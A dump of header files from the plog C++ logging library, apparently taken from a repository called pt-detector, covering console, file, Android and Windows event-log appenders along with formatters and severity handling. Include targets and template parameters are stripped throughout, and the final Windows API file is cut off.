https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Corelan_scripts/pveWritebin.pl -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/AndroidAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | template 8 | class AndroidAppender : public IAppender 9 | { 10 | public: 11 | AndroidAppender(const char* tag) : m_tag(tag) 12 | { 13 | } 14 | 15 | virtual void write(const Record& record) 16 | { 17 | std::string str = Formatter::format(record); 18 | 19 | __android_log_print(toPriority(record.getSeverity()), m_tag, "%s", str.c_str()); 20 | } 21 | 22 | private: 23 | static android_LogPriority toPriority(Severity severity) 24 | { 25 | switch (severity) 26 | { 27 | case fatal: 28 | return ANDROID_LOG_FATAL; 29 | case error: 30 | return ANDROID_LOG_ERROR; 31 | case warning: 32 | return ANDROID_LOG_WARN; 33 | case info: 34 | return ANDROID_LOG_INFO; 35 | case debug: 36 | return ANDROID_LOG_DEBUG; 37 | case verbose: 38 | return ANDROID_LOG_VERBOSE; 39 | default: 40 | return ANDROID_LOG_UNKNOWN; 41 | } 42 | } 43 | 44 | private: 45 | const char* const m_tag; 46 | }; 47 | } 48 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/ColorConsoleAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | template 8 | class ColorConsoleAppender : public ConsoleAppender 9 | { 10 | public: 11 | #ifdef _WIN32 12 | ColorConsoleAppender() : m_originalAttr() 13 | { 14 | if (this->m_isatty) 15 | { 16 | CONSOLE_SCREEN_BUFFER_INFO csbiInfo; 17 | GetConsoleScreenBufferInfo(this->m_stdoutHandle, &csbiInfo); 18 | 19 | m_originalAttr = csbiInfo.wAttributes; 20 | } 21 | } 22 | #else 23 | ColorConsoleAppender() {} 24 | #endif 25 | 26 | virtual void write(const Record& record) 27 | { 28 | util::nstring str = Formatter::format(record); 29 | util::MutexLock lock(this->m_mutex); 30 | 31 | setColor(record.getSeverity()); 32 | this->writestr(str); 33 | resetColor(); 34 | } 35 | 36 | private: 37 | void setColor(Severity severity) 38 | { 39 | if (this->m_isatty) 40 | { 41 | switch (severity) 42 | { 43 | #ifdef _WIN32 44 | case fatal: 45 | SetConsoleTextAttribute(this->m_stdoutHandle, foreground::kRed | foreground::kGreen | foreground::kBlue | foreground::kIntensity | background::kRed); // white on red background 46 | break; 47 | 48 | case error: 49 | SetConsoleTextAttribute(this->m_stdoutHandle, static_cast(foreground::kRed | foreground::kIntensity | (m_originalAttr & 0xf0))); // red 50 | break; 51 | 52 | case warning: 53 | SetConsoleTextAttribute(this->m_stdoutHandle, static_cast(foreground::kRed | foreground::kGreen | foreground::kIntensity | (m_originalAttr & 0xf0))); // yellow 54 | break; 55 | 56 | case debug: 57 | case verbose: 58 | SetConsoleTextAttribute(this->m_stdoutHandle, static_cast(foreground::kGreen | foreground::kBlue | foreground::kIntensity | (m_originalAttr & 0xf0))); // cyan 59 | break; 60 | #else 61 | case fatal: 62 | std::cout << "\x1B[97m\x1B[41m"; // white on red background 63 | break; 64 | 65 | case error: 66 | std::cout << "\x1B[91m"; // red 67 | break; 68 | 69 | case warning: 70 | std::cout << "\x1B[93m"; // yellow 71 | break; 72 | 73 | case debug: 74 | case verbose: 75 | std::cout << "\x1B[96m"; // cyan 76 | break; 77 | #endif 78 | default: 79 | break; 80 | } 81 | } 82 | } 83 | 84 | void resetColor() 85 | { 86 | if (this->m_isatty) 87 | { 88 | #ifdef _WIN32 89 | SetConsoleTextAttribute(this->m_stdoutHandle, m_originalAttr); 90 | #else 91 | std::cout << "\x1B[0m\x1B[0K"; 92 | #endif 93 | } 94 | } 95 | 96 | private: 97 | #ifdef _WIN32 98 | WORD m_originalAttr; 99 | #endif 100 | }; 101 | } 102 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/ConsoleAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | namespace plog 8 | { 9 | template 10 | class ConsoleAppender : public IAppender 11 | { 12 | public: 13 | #ifdef _WIN32 14 | ConsoleAppender() : m_isatty(!!_isatty(_fileno(stdout))), m_stdoutHandle() 15 | { 16 | if (m_isatty) 17 | { 18 | m_stdoutHandle = GetStdHandle(stdHandle::kOutput); 19 | } 20 | } 21 | #else 22 | ConsoleAppender() : m_isatty(!!isatty(fileno(stdout))) {} 23 | #endif 24 | 25 | virtual void write(const Record& record) 26 | { 27 | util::nstring str = Formatter::format(record); 28 | util::MutexLock lock(m_mutex); 29 | 30 | writestr(str); 31 | } 32 | 33 | protected: 34 | void writestr(const util::nstring& str) 35 | { 36 | #ifdef _WIN32 37 | if (m_isatty) 38 | { 39 | WriteConsoleW(m_stdoutHandle, str.c_str(), static_cast(str.size()), NULL, NULL); 40 | } 41 | else 42 | { 43 | std::cout << util::toNarrow(str, codePage::kActive) << std::flush; 44 | } 45 | #else 46 | std::cout << str << std::flush; 47 | #endif 48 | } 49 | 50 | private: 51 | #ifdef __BORLANDC__ 52 | static int _isatty(int fd) { return ::isatty(fd); } 53 | #endif 54 | 55 | protected: 56 | util::Mutex m_mutex; 57 | const bool m_isatty; 58 | #ifdef _WIN32 59 | HANDLE m_stdoutHandle; 60 | #endif 61 | }; 62 | } 63 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/DebugOutputAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | template 8 | class DebugOutputAppender : public IAppender 9 | { 10 | public: 11 | virtual void write(const Record& record) 12 | { 13 | OutputDebugStringW(Formatter::format(record).c_str()); 14 | } 15 | }; 16 | } 17 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/EventLogAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | template 8 | class EventLogAppender : public IAppender 9 | { 10 | public: 11 | EventLogAppender(const wchar_t* sourceName) : m_eventSource(RegisterEventSourceW(NULL, sourceName)) 12 | { 13 | } 14 | 15 | ~EventLogAppender() 16 | { 17 | DeregisterEventSource(m_eventSource); 18 | } 19 | 20 | virtual void write(const Record& record) 21 | { 22 | std::wstring str = Formatter::format(record); 23 | const wchar_t* logMessagePtr[] = { str.c_str() }; 24 | 25 | ReportEventW(m_eventSource, logSeverityToType(record.getSeverity()), static_cast(record.getSeverity()), 0, NULL, 1, 0, logMessagePtr, NULL); 26 | } 27 | 28 | private: 29 | static WORD logSeverityToType(plog::Severity severity) 30 | { 31 | switch (severity) 32 | { 33 | case plog::fatal: 34 | case plog::error: 35 | return eventLog::kErrorType; 36 | 37 | case plog::warning: 38 | return eventLog::kWarningType; 39 | 40 | case plog::info: 41 | case plog::debug: 42 | case plog::verbose: 43 | default: 44 | return eventLog::kInformationType; 45 | } 46 | } 47 | 48 | private: 49 | HANDLE m_eventSource; 50 | }; 51 | 52 | class EventLogAppenderRegistry 53 | { 54 | public: 55 | static bool add(const wchar_t* sourceName, const wchar_t* logName = L"Application") 56 | { 57 | std::wstring logKeyName; 58 | std::wstring sourceKeyName; 59 | getKeyNames(sourceName, logName, sourceKeyName, logKeyName); 60 | 61 | HKEY sourceKey; 62 | if (0 != RegCreateKeyExW(hkey::kLocalMachine, sourceKeyName.c_str(), 0, NULL, 0, regSam::kSetValue, NULL, &sourceKey, NULL)) 63 | { 64 | return false; 65 | } 66 | 67 | const DWORD kTypesSupported = eventLog::kErrorType | eventLog::kWarningType | eventLog::kInformationType; 68 | RegSetValueExW(sourceKey, L"TypesSupported", 0, regType::kDword, &kTypesSupported, sizeof(kTypesSupported)); 69 | 70 | const wchar_t kEventMessageFile[] = L"%windir%\\Microsoft.NET\\Framework\\v4.0.30319\\EventLogMessages.dll;%windir%\\Microsoft.NET\\Framework\\v2.0.50727\\EventLogMessages.dll"; 71 | RegSetValueExW(sourceKey, L"EventMessageFile", 0, regType::kExpandSz, kEventMessageFile, static_cast(::wcslen(kEventMessageFile) * sizeof(wchar_t))); 72 | 73 | RegCloseKey(sourceKey); 74 | return true; 75 | } 76 | 77 | static bool exists(const wchar_t* sourceName, const wchar_t* logName = L"Application") 78 | { 79 | std::wstring logKeyName; 80 | std::wstring sourceKeyName; 81 | getKeyNames(sourceName, logName, sourceKeyName, logKeyName); 82 | 83 | HKEY sourceKey; 84 | if (0 != RegOpenKeyExW(hkey::kLocalMachine, sourceKeyName.c_str(), 0, regSam::kQueryValue, &sourceKey)) 85 | { 86 | return false; 87 | } 88 | 89 | RegCloseKey(sourceKey); 90 | return true; 91 | } 92 | 93 | static void remove(const wchar_t* sourceName, const wchar_t* logName = L"Application") 94 | { 95 | std::wstring logKeyName; 96 | std::wstring sourceKeyName; 97 | getKeyNames(sourceName, logName, sourceKeyName, logKeyName); 98 | 99 | RegDeleteKeyW(hkey::kLocalMachine, sourceKeyName.c_str()); 100 | RegDeleteKeyW(hkey::kLocalMachine, logKeyName.c_str()); 101 | } 102 | 103 | private: 104 | static void getKeyNames(const wchar_t* sourceName, const wchar_t* logName, std::wstring& sourceKeyName, std::wstring& logKeyName) 105 | { 106 | const std::wstring kPrefix = L"SYSTEM\\CurrentControlSet\\Services\\EventLog\\"; 107 | logKeyName = kPrefix + logName; 108 | sourceKeyName = logKeyName + L"\\" + sourceName; 109 | } 110 | }; 111 | } 112 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/IAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | namespace plog 5 | { 6 | class IAppender 7 | { 8 | public: 9 | virtual ~IAppender() 10 | { 11 | } 12 | 13 | virtual void write(const Record& record) = 0; 14 | }; 15 | } 16 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Appenders/RollingFileAppender.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | namespace plog 8 | { 9 | template 10 | class RollingFileAppender : public IAppender 11 | { 12 | public: 13 | RollingFileAppender(const util::nchar* fileName, size_t maxFileSize = 0, int maxFiles = 0) 14 | : m_fileSize() 15 | , m_maxFileSize((std::max)(static_cast(maxFileSize), static_cast(1000))) // set a lower limit for the maxFileSize 16 | , m_lastFileNumber((std::max)(maxFiles - 1, 0)) 17 | , m_firstWrite(true) 18 | { 19 | util::splitFileName(fileName, m_fileNameNoExt, m_fileExt); 20 | } 21 | 22 | #ifdef _WIN32 23 | RollingFileAppender(const char* fileName, size_t maxFileSize = 0, int maxFiles = 0) 24 | : m_fileSize() 25 | , m_maxFileSize((std::max)(static_cast(maxFileSize), static_cast(1000))) // set a lower limit for the maxFileSize 26 | , m_lastFileNumber((std::max)(maxFiles - 1, 0)) 27 | , m_firstWrite(true) 28 | { 29 | util::splitFileName(util::toWide(fileName).c_str(), m_fileNameNoExt, m_fileExt); 30 | } 31 | #endif 32 | 33 | virtual void write(const Record& record) 34 | { 35 | util::MutexLock lock(m_mutex); 36 | 37 | if (m_firstWrite) 38 | { 39 | openLogFile(); 40 | m_firstWrite = false; 41 | } 42 | else if (m_lastFileNumber > 0 && m_fileSize > m_maxFileSize && -1 != m_fileSize) 43 | { 44 | rollLogFiles(); 45 | } 46 | 47 | int bytesWritten = m_file.write(Converter::convert(Formatter::format(record))); 48 | 49 | if (bytesWritten > 0) 50 | { 51 | m_fileSize += bytesWritten; 52 | } 53 | } 54 | 55 | private: 56 | void rollLogFiles() 57 | { 58 | m_file.close(); 59 | 60 | util::nstring lastFileName = buildFileName(m_lastFileNumber); 61 | util::File::unlink(lastFileName.c_str()); 62 | 63 | for (int fileNumber = m_lastFileNumber - 1; fileNumber >= 0; --fileNumber) 64 | { 65 | util::nstring currentFileName = buildFileName(fileNumber); 66 | util::nstring nextFileName = buildFileName(fileNumber + 1); 67 | 68 | util::File::rename(currentFileName.c_str(), nextFileName.c_str()); 69 | } 70 | 71 | openLogFile(); 72 | } 73 | 74 | void openLogFile() 75 | { 76 | util::nstring fileName = buildFileName(); 77 | m_fileSize = m_file.open(fileName.c_str()); 78 | 79 | if (0 == m_fileSize) 80 | { 81 | int bytesWritten = m_file.write(Converter::header(Formatter::header())); 82 | 83 | if (bytesWritten > 0) 84 | { 85 | m_fileSize += bytesWritten; 86 | } 87 | } 88 | } 89 | 90 | util::nstring buildFileName(int fileNumber = 0) 91 | { 92 | util::nostringstream ss; 93 | ss << m_fileNameNoExt; 94 | 95 | if (fileNumber > 0) 96 | { 97 | ss << '.' << fileNumber; 98 | } 99 | 100 | if (!m_fileExt.empty()) 101 | { 102 | ss << '.' << m_fileExt; 103 | } 104 | 105 | return ss.str(); 106 | } 107 | 108 | private: 109 | util::Mutex m_mutex; 110 | util::File m_file; 111 | off_t m_fileSize; 112 | const off_t m_maxFileSize; 113 | const int m_lastFileNumber; 114 | util::nstring m_fileExt; 115 | util::nstring m_fileNameNoExt; 116 | bool m_firstWrite; 117 | }; 118 | } 119 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Converters/NativeEOLConverter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | template 8 | class NativeEOLConverter : public NextConverter 9 | { 10 | #ifdef _WIN32 11 | public: 12 | static std::string header(const util::nstring& str) 13 | { 14 | return NextConverter::header(fixLineEndings(str)); 15 | } 16 | 17 | static std::string convert(const util::nstring& str) 18 | { 19 | return NextConverter::convert(fixLineEndings(str)); 20 | } 21 | 22 | private: 23 | static std::wstring fixLineEndings(const std::wstring& str) 24 | { 25 | std::wstring output; 26 | output.reserve(str.length() * 2); 27 | 28 | for (size_t i = 0; i < str.size(); ++i) 29 | { 30 | wchar_t ch = str[i]; 31 | 32 | if (ch == L'\n') 33 | { 34 | output.push_back(L'\r'); 35 | } 36 | 37 | output.push_back(ch); 38 | } 39 | 40 | return output; 41 | } 42 | #endif 43 | }; 44 | } 45 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Converters/UTF8Converter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | namespace plog 5 | { 6 | class UTF8Converter 7 | { 8 | public: 9 | static std::string header(const util::nstring& str) 10 | { 11 | const char kBOM[] = "\xEF\xBB\xBF"; 12 | 13 | return std::string(kBOM) + convert(str); 14 | } 15 | 16 | #ifdef _WIN32 17 | static std::string convert(const util::nstring& str) 18 | { 19 | return util::toNarrow(str, codePage::kUTF8); 20 | } 21 | #else 22 | static const std::string& convert(const util::nstring& str) 23 | { 24 | return str; 25 | } 26 | #endif 27 | }; 28 | } 29 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Formatters/CsvFormatter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | namespace plog 7 | { 8 | class CsvFormatter 9 | { 10 | public: 11 | static util::nstring header() 12 | { 13 | return PLOG_NSTR("Date;Time;Severity;TID;This;Function;Message\n"); 14 | } 15 | 16 | static util::nstring format(const Record& record) 17 | { 18 | tm t; 19 | util::localtime_s(&t, &record.getTime().time); 20 | 21 | util::nostringstream ss; 22 | ss << t.tm_year + 1900 << PLOG_NSTR("/") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_mon + 1 << PLOG_NSTR("/") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_mday << PLOG_NSTR(";"); 23 | ss << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_hour << PLOG_NSTR(":") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_min << PLOG_NSTR(":") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_sec << PLOG_NSTR(".") << std::setfill(PLOG_NSTR('0')) << std::setw(3) << record.getTime().millitm << PLOG_NSTR(";"); 24 | ss << severityToString(record.getSeverity()) << PLOG_NSTR(";"); 25 | ss << record.getTid() << PLOG_NSTR(";"); 26 | ss << record.getObject() << PLOG_NSTR(";"); 27 | ss << record.getFunc() << PLOG_NSTR("@") << record.getLine() << PLOG_NSTR(";"); 28 | 29 | util::nstring message = record.getMessage(); 30 | 31 | if (message.size() > kMaxMessageSize) 32 | { 33 | message.resize(kMaxMessageSize); 34 | message.append(PLOG_NSTR("...")); 35 | } 36 | 37 | util::nistringstream split(message); 38 | util::nstring token; 39 | 40 | while (!split.eof()) 41 | { 42 | std::getline(split, token, PLOG_NSTR('"')); 43 | ss << PLOG_NSTR("\"") << token << PLOG_NSTR("\""); 44 | } 45 | 46 | ss << PLOG_NSTR("\n"); 47 | 48 | return ss.str(); 49 | } 50 | 51 | static const size_t kMaxMessageSize = 32000; 52 | }; 53 | } 54 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Formatters/FuncMessageFormatter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | class FuncMessageFormatter 8 | { 9 | public: 10 | static util::nstring header() 11 | { 12 | return util::nstring(); 13 | } 14 | 15 | static util::nstring format(const Record& record) 16 | { 17 | util::nostringstream ss; 18 | ss << record.getFunc() << PLOG_NSTR("@") << record.getLine() << PLOG_NSTR(": ") << record.getMessage() << PLOG_NSTR("\n"); 19 | 20 | return ss.str(); 21 | } 22 | }; 23 | } 24 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Formatters/MessageOnlyFormatter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | namespace plog 6 | { 7 | class MessageOnlyFormatter 8 | { 9 | public: 10 | static util::nstring header() 11 | { 12 | return util::nstring(); 13 | } 14 | 15 | static util::nstring format(const Record& record) 16 | { 17 | util::nostringstream ss; 18 | ss << record.getMessage() << PLOG_NSTR("\n"); 19 | 20 | return ss.str(); 21 | } 22 | }; 23 | } 24 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Formatters/TxtFormatter.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | namespace plog 7 | { 8 | class TxtFormatter 9 | { 10 | public: 11 | static util::nstring header() 12 | { 13 | return util::nstring(); 14 | } 15 | 16 | static util::nstring format(const Record& record) 17 | { 18 | tm t; 19 | util::localtime_s(&t, &record.getTime().time); 20 | 21 | util::nostringstream ss; 22 | ss << t.tm_year + 1900 << "-" << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_mon + 1 << PLOG_NSTR("-") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_mday << PLOG_NSTR(" "); 23 | ss << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_hour << PLOG_NSTR(":") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_min << PLOG_NSTR(":") << std::setfill(PLOG_NSTR('0')) << std::setw(2) << t.tm_sec << PLOG_NSTR(".") << std::setfill(PLOG_NSTR('0')) << std::setw(3) << record.getTime().millitm << PLOG_NSTR(" "); 24 | ss << std::setfill(PLOG_NSTR(' ')) << std::setw(5) << std::left << severityToString(record.getSeverity()) << PLOG_NSTR(" "); 25 | ss << PLOG_NSTR("[") << record.getTid() << PLOG_NSTR("] "); 26 | ss << PLOG_NSTR("[") << record.getFunc() << PLOG_NSTR("@") << record.getLine() << PLOG_NSTR("] "); 27 | ss << record.getMessage() << PLOG_NSTR("\n"); 28 | 29 | return ss.str(); 30 | } 31 | }; 32 | } 33 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Init.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | namespace plog 9 | { 10 | namespace 11 | { 12 | bool isCsv(const util::nchar* fileName) 13 | { 14 | const util::nchar* dot = util::findExtensionDot(fileName); 15 | #ifdef _WIN32 16 | return dot && 0 == std::wcscmp(dot, L".csv"); 17 | #else 18 | return dot && 0 == std::strcmp(dot, ".csv"); 19 | #endif 20 | } 21 | } 22 | 23 | ////////////////////////////////////////////////////////////////////////// 24 | // Empty initializer / one appender 25 | 26 | template 27 | inline Logger& init(Severity maxSeverity = none, IAppender* appender = NULL) 28 | { 29 | static Logger logger(maxSeverity); 30 | return appender ? logger.addAppender(appender) : logger; 31 | } 32 | 33 | inline Logger& init(Severity maxSeverity = none, IAppender* appender = NULL) 34 | { 35 | return init(maxSeverity, appender); 36 | } 37 | 38 | ////////////////////////////////////////////////////////////////////////// 39 | // RollingFileAppender with any Formatter 40 | 41 | template 42 | inline Logger& init(Severity maxSeverity, const util::nchar* fileName, size_t maxFileSize = 0, int maxFiles = 0) 43 | { 44 | static RollingFileAppender rollingFileAppender(fileName, maxFileSize, maxFiles); 45 | return init(maxSeverity, &rollingFileAppender); 46 | } 47 | 48 | template 49 | inline Logger& init(Severity maxSeverity, const util::nchar* fileName, size_t maxFileSize = 0, int maxFiles = 0) 50 | { 51 | return init(maxSeverity, fileName, maxFileSize, maxFiles); 52 | } 53 | 54 | ////////////////////////////////////////////////////////////////////////// 55 | // RollingFileAppender with TXT/CSV chosen by file extension 56 | 57 | template 58 | inline Logger& init(Severity maxSeverity, const util::nchar* fileName, size_t maxFileSize = 0, int maxFiles = 0) 59 | { 60 | return isCsv(fileName) ? init(maxSeverity, fileName, maxFileSize, maxFiles) : init(maxSeverity, fileName, maxFileSize, maxFiles); 61 | } 62 | 63 | inline Logger& init(Severity maxSeverity, const util::nchar* fileName, size_t maxFileSize = 0, int maxFiles = 0) 64 | { 65 | return init(maxSeverity, fileName, maxFileSize, maxFiles); 66 | } 67 | 68 | ////////////////////////////////////////////////////////////////////////// 69 | // CHAR variants for Windows 70 | 71 | #ifdef _WIN32 72 | template 73 | inline Logger& init(Severity maxSeverity, const char* fileName, size_t maxFileSize = 0, int maxFiles = 0) 74 | { 75 | return init(maxSeverity, util::toWide(fileName).c_str(), maxFileSize, maxFiles); 76 | } 77 | 78 | template 79 | inline Logger& init(Severity maxSeverity, const char* fileName, size_t maxFileSize = 0, int maxFiles = 0) 80 | { 81 | return init(maxSeverity, fileName, maxFileSize, maxFiles); 82 | } 83 | 84 | template 85 | inline Logger& init(Severity maxSeverity, const char* fileName, size_t maxFileSize = 0, int maxFiles = 0) 86 | { 87 | return init(maxSeverity, util::toWide(fileName).c_str(), maxFileSize, maxFiles); 88 | } 89 | 90 | inline Logger& init(Severity maxSeverity, const char* fileName, size_t maxFileSize = 0, int maxFiles = 0) 91 | { 92 | return init(maxSeverity, fileName, maxFileSize, maxFiles); 93 | } 94 | #endif 95 | } 96 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Logger.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef PLOG_DEFAULT_INSTANCE 7 | # define PLOG_DEFAULT_INSTANCE 0 8 | #endif 9 | 10 | namespace plog 11 | { 12 | template 13 | class Logger : public util::Singleton >, public IAppender 14 | { 15 | public: 16 | Logger(Severity maxSeverity = none) : m_maxSeverity(maxSeverity) 17 | { 18 | } 19 | 20 | Logger& addAppender(IAppender* appender) 21 | { 22 | assert(appender != this); 23 | m_appenders.push_back(appender); 24 | return *this; 25 | } 26 | 27 | Severity getMaxSeverity() const 28 | { 29 | return m_maxSeverity; 30 | } 31 | 32 | void setMaxSeverity(Severity severity) 33 | { 34 | m_maxSeverity = severity; 35 | } 36 | 37 | bool checkSeverity(Severity severity) const 38 | { 39 | return severity <= m_maxSeverity; 40 | } 41 | 42 | virtual void write(const Record& record) 43 | { 44 | if (checkSeverity(record.getSeverity())) 45 | { 46 | *this += record; 47 | } 48 | } 49 | 50 | void operator+=(const Record& record) 51 | { 52 | for (std::vector::iterator it = m_appenders.begin(); it != m_appenders.end(); ++it) 53 | { 54 | (*it)->write(record); 55 | } 56 | } 57 | 58 | private: 59 | Severity m_maxSeverity; 60 | std::vector m_appenders; 61 | }; 62 | 63 | template 64 | inline Logger* get() 65 | { 66 | return Logger::getInstance(); 67 | } 68 | 69 | inline Logger* get() 70 | { 71 | return Logger::getInstance(); 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Resources/Plog/plog/Severity.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace plog 4 | { 5 | enum Severity 6 | { 7 | none = 0, 8 | fatal = 1, 9 | error = 2, 10 | warning = 3, 11 | info = 4, 12 | debug = 5, 13 | verbose = 6 14 | }; 15 | 16 | inline const char* severityToString(Severity severity) 17 | { 18 | switch (severity) 19 | { 20 | case fatal: 21 | return "FATAL"; 22 | case error: 23 | return "ERROR"; 24 | case warning: 25 | return "WARN"; 26 | case info: 27 | return "INFO"; 28 | case debug: 29 | return "DEBUG"; 30 | case verbose: 31 | return "VERB"; 32 | default: 33 | return "NONE"; 34 | } 35 | } 36 | 37 | inline Severity severityFromString(const char* str) 38 | { 39 | for (Severity severity = fatal; severity <= verbose; severity = static_cast(severity + 1)) 40 | { 41 | if (severityToString(severity)[0] == str[0]) 42 | { 43 | return severity; 44 | } 45 | } 46 | 47 | return none; 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /Resources/Plog/plog/WinApi.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifdef _WIN32 4 | namespace plog 5 | { 6 | typedef unsigned long DWORD; 7 | typedef unsigned short WORD; 8 | typedef unsigned int UINT; 9 | typedef int BOOL; 10 | typedef long LSTATUS; 11 | typedef char* LPSTR; 12 | typedef wchar_t* LPWSTR; 13 | typedef const char* LPCSTR; 14 | typedef const wchar_t* LPCWSTR; 15 | typedef void* HANDLE; 16 | typedef void* HKEY; 17 | typedef size_t ULONG_PTR; 18 | 19 | struct CRITICAL_SECTION 20 | { 21 | void* DebugInfo; 22 | long LockCount; 23 | long RecursionCount; 24 | HANDLE OwningThread; 25 | HANDLE LockSemaphore; 26 | ULONG_PTR SpinCount; 27 | }; 28 | 29 | struct COORD 30 | { 31 | short X; 32 | short Y; 33 | }; 34 | 35 | struct SMALL_RECT 36 | { 37 | short Left; 38 | short Top; 39 | short Right; 40 | short Bottom; 41 | }; 42 | 43 | struct CONSOLE_SCREEN_BUFFER_INFO 44 | { 45 | COORD dwSize; 46 | COORD dwCursorPosition; 47 | WORD wAttributes; 48 | SMALL_RECT srWindow; 49 | COORD dwMaximumWindowSize; 50 | }; 51 | 52 | namespace codePage 53 | { 54 | const UINT kActive = 0; 55 | const UINT kUTF8 = 65001; 56 | } 57 | 58 | namespace eventLog 59 | { 60 | const WORD kErrorType = 0x0001; 61 | const WORD kWarningType = 0x0002; 62 | const WORD kInformationType = 0x0004; 63 | } 64 | 65 | namespace hkey 66 | { 67 | const HKEY kLocalMachine = reinterpret_cast(static_cast(0x80000002)); 68 | } 69 | 70 | namespace regSam 71 | { 72 | const DWORD kQueryValue = 0x0001; 73 | const DWORD kSetValue = 0x0002; 74 | } 75 | 76 | namespace regType 77 | { 78 | const DWORD kExpandSz = 2; 79 | const DWORD kDword = 4; 80 | } 81 | 82 | namespace stdHandle 83 | { 84 | const DWORD kOutput = static_cast(-11); 85 | } 86 | 87 | namespace foreground 88 | { 89 | const WORD kBlue = 0x0001; 90 | const WORD kGreen = 0x0002; 91 | const WORD kRed = 0x0004; 92 | const WORD kIntensity = 0x0008; 93 | } 94 | 95 | namespace background 96 | { 97 | const WORD kBlue = 0x0010; 98 | const WORD kGreen = 0x0020; 99 | const WORD kRed = 0x0040; 100 | const WORD kIntensity = 0x0080; 101 | } 102 | 103 | extern "C" 104 | { 105 | __declspec(dllimport) int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar); 106 | __declspec(dllimport) int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, const char* lpDefaultChar, BOOL* lpUsedDefaultChar); 107 | 108 | __declspec(dllimport) DWORD __stdcall GetCurrentThreadId(); 109 | 110 | __declspec(dllimport) BOOL __stdcall MoveFileW(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName); 111 | 112 | __declspec(dllimport) void __stdcall InitializeCriticalSection(CRITICAL_SECTION* lpCriticalSection); 113 | __declspec(dllimport) void __stdcall EnterCriticalSection(CRITICAL_SECTION* lpCriticalSection); 114 | __declspec(dllimport) void __stdcall LeaveCriticalSection(CRITICAL_SECTION* lpCriticalSection); 115 | __declspec(dllimport) void __stdcall DeleteCriticalSection(CRITICAL_SECTION* lpCriticalSection); 116 | 117 | __declspec(dllimport) HANDLE __stdcall RegisterEventSourceW(LPCWSTR lpUNCServerName, LPCWSTR lpSourceName); 118 | __declspec(dllimport) BOOL __stdcall DeregisterEventSource(HANDLE hEventLog); 119 | __declspec(dllimport) BOOL __stdcall ReportEventW(HANDLE hEventLog, WORD wType, WORD wCategory, DWORD dwEventID, void* lpUserSid, WORD wNumStrings, DWORD dwDataSize, LPCWSTR* lpStrings, void* lpRawData); 120 | 121 | __declspec(dllimport) LSTATUS __stdcall RegCreateKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD Reserved, LPWSTR lpClass, DWORD dwOptions, DWORD samDesired, void* lpSecurityAttributes, HKEY* phkResult, DWORD* lpdwDisposition); 122 | __declspec(dllimport) LSTATUS __stdcall RegSetValueExW(HKEY hKey, LPCWSTR lpValueName, DWORD Reserved, DWORD dwType, const void* lpData, DWORD cbData); 123 | __declspec(dllimport) LSTATUS __stdcall RegCloseKey(HKEY hKey); 124 | __declspec(dllimport) LSTATUS __stdcall RegOpenKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, DWORD samDesired, HKEY* phkResult); 125 | 